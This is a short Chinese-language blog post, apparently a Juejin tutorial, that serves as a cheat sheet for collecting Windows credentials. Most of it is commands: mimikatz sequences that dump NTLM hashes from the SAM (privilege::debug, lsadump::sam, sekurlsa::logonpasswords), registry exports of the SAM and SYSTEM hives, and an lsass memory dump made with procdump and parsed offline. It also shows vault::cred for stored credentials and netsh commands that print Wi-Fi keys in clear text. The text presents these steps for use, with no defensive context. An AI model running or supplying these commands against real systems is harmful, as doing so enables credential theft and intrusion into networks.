域内密码搜集

359 阅读1分钟

本文已参与「新人创作礼」活动.一起开启掘金创作之路。

SAM

mimikatz读取sam文件

#提升权限
privilege::debug
token::elevate
#读取本地SAM文件,获得NTLM Hash
lsadump::sam

利用注册表导出sam文件

1、导出 SAM 和 System 文件:通过 reg 的注册表导出

reg save hklm\sam sam.hive
reg save hklm\system system.hive

2、使用mimikatz读取SAM和System文件

将导出的 system.hive 和 sam.hive 文件放到 mimikatz 文件夹下,然后运行mimikatz命令:

lsadump::sam /sam:sam.hive /system:system.hive

mimikatz在线读取sam文件

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"

lsass

procdump+mimikatz抓取密码

procdump 下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

1、导出lsass.dmp文件

通过 procdump.exe 文件导出lsass.dmp文件

在命令行输入命令会生成一个 lsass.dmp 文件:

procdump.exe -accepteula -ma lsass.exe lsass.dmp

2、使用mimikatz导出lsass.dmp文件中的密码散列值

首先将导出的lsass.dmp文件放到mimikatz的目录下,然后输入命令:

sekurlsa::minidump lsass.dmp

如果有 Switch to MINIDUMP 说明加载成功

3、运行命令导出密码散列值:

sekurlsa::logonPasswords full

windows凭据

mimikatz获取window普通凭据

mimikatz # vault::cred

wifi密码获取

netsh wlan show profile
netsh wlan show profile name="ssid" KEY=clear